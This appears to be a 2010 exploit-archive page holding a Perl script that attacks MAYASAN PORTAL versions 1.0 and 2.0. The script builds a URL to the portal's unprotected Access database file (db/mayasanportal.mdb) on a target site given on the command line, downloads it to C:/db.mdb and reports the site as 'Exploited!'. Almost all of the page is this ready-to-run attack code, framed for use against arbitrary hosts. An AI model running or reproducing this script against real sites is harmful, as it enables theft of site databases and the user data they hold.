MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
Posted on 30 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================== MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit ======================================================== #!/usr/bin/perl -w # # MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit # # Found & Coded: ZoRLu # # Tested on my vista proof: http://img37.imageshack.us/img37/3531/testcz.jpg # # Date: 25/07/2010 # # Home: z0rlu.blogspot.com # # Thanks: Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends # # Download : http://mportal.somee.com/indir/v20/v20/v20.zip use LWP::Simple; use LWP::UserAgent; system('cls'); system('title MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit'); system('color 4'); if(@ARGV < 2) { print "[-]Ornegi inceleyin "; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ "; print "[+] usage2 : perl $0 localhost / "; } print " ************************************************************************ "; print "* MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit * "; print "* Exploited By : ZoRLu * "; print "* msn : admin[at]yildirimordulari.com * "; print "* Home : http://z0rlu.blogspot.com * "; print "********************************************************************* "; ($TargetIP, $path, $File,) = @ARGV; $File="db/mayasanportal.mdb"; my $url = "http://" . $TargetIP . $path . $File; print " wait!!! "; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "C:/db.mdb"); if ($request->is_success) { print "[+] $url Exploited! "; print "[+] Database saved to C:/db.mdb "; exit(); } else { print "[!] Exploiting $url Failed ! [!] ".$request->status_line." "; exit(); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
